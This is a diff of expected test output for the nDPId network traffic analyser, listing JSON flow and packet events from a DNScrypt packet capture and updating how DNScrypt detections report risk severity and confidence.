AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YkgAH4RoBIKAAAB1C\/kiNwPAbsGBMhCbeEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00429{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YkAuX4RxOUKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YogAH4RoBEKAAAB1C\/kiO3VAbsGBLZ+bd8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00429{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YoAuX4RxOQKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":946739380832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739380832,"pkt":"ZmZmZmZmRERERERECABFAADWpUBAADIRKWLUL+SICgAAAQG7leMAwtNqbd6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"}
@@ -956,24 +956,24 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":946739380844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739380844,"pkt":"ZmZmZmZmRERERERECABFAADWpUVAADIRKV3UL+SICgAAAQG7n0cAwsoEbeCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcVMVAAH4RMmQKAAABVQVd5uZEIPsCCHXB4\/IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcCx1AAH4RfAwKAAABVQVd5sTjIPsCCHXB4\/ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcVMZAAH4RMmMKAAABVQVd5rY2IPsCCHXB4+4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
